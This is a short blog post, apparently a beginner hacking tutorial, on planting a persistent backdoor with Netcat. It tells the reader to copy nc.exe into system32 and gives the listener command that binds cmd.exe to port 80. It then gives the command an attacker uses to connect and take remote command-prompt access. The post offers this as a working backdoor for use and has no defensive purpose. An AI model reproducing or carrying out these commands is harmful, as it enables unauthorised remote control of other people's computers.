Backdoor via Netcat


Most of you are probably asking what is NetCat? To make it simple, 

NetCat/NC makes and accepts Transmission Control Protocol (TCP) 

and User Datagram Protocol (UDP) connections. Literally that's it lol

This is for the newbies who dont know what NC is and want to 

know how to backdoor using this software.

How to make a persistent backdoor with NetCat , The first thing

we want to do is put nc.exe, which is the executable file, in

system32. Then After that we are going to head to CMD and

make a persistent listener.

1. Downlaod NC

http://www.downloadnetcat.com/

2. Place NC.exe in system32

3. Go to NC CMD and type this Command Line.

Code:
nc -v -L -p 80 -e cmd.exe

Let me explain the code, -v is verbose, -L is to make it Listen which

is different from -l because if you would have put -l parameters

instead of -L parameters, once you close the CMD window, the NC

session will be closed as well. -p is the port you want to listen to. -e

is the executable program you want to launch once the connection is

established, in our case, command prompt.

Now you can close the window and still have NC listening on port

80. Now that you have backdoored the remote machine with it, its

time to connect to it.

On the attacking machine, go to CMD and type this command line:

Code:

nc -v [IpOfTargetMachine] 80

Once you hit enter, you will have CMD access to the remote computer!

No comments:

Post a Comment